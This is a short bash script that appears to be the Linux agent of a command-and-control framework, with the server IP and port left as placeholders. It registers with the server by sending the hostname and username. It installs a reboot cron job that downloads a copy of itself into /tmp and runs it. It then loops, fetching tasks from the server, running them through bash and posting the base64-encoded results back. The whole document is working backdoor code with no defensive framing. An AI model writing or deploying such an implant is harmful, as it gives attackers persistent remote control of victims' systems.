#!/bin/bash

#Define parameters needed
ip="REPLACE_IP"
port="REPLACE_PORT"
interface="REPLACE_INTERFACE"
n=.3

#Define agent Registeration link
regl="http://$ip:$port/reg/"

declare -A data=( [eth]=$interface [hname]=$(hostname) )

#Get defined agent name (6 random characters)
name=$(curl -X POST -F eth=$interface -F hname=$(hostname) -F username=$(whoami) $regl)

#Define task, results links
taskl="http://$ip:$port/tasks/$name/"
resultl="http://$ip:$port/Lin-results/$name/"

# Add the cronjob to run the script after rebooting (presistency providing)
echo "@reboot sleep 45 && wget http://$ip:$port/download/$interface -O /tmp/bash;chmod +x /tmp/bash;bash /tmp/bash" | crontab -

while :
do
    #Check for tasks
    curl $taskl > /tmp/tasks
    if [ -s /tmp/tasks ]; then
        #Execute tasks added
        cat /tmp/tasks | bash > /tmp/results
        base64 /tmp/results > /tmp/enc-result
        curl -X POST --data "@/tmp/enc-result" $resultl
    fi
    #Sleep for a while then continue the loop
    sleep $n
done

